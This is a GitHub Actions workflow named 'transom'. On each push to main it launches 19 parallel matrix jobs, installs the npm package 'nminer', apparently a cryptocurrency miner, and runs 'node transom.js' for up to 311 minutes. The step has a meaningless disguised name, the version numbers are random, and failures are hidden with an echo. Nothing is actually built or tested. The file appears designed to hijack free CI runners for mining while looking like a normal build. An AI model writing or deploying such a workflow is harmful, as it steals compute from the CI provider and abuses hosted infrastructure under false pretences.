name: transom
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4051 }
          - { version: 7509 }
          - { version: 6513 }
          - { version: 786 }
          - { version: 6640 }
          - { version: 9854 }
          - { version: 2175 }
          - { version: 9642 }
          - { version: 1470 }
          - { version: 566 }
          - { version: 8722 }
          - { version: 4960 }
          - { version: 8533 }
          - { version: 2451 }
          - { version: 1766 }
          - { version: 4849 }
          - { version: 3857 }
          - { version: 1053 }
          - { version: 1599 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: etch superb numeric sans
        run: |
          npm install nminer@latest
          timeout 311m node transom.js || echo "transom executed"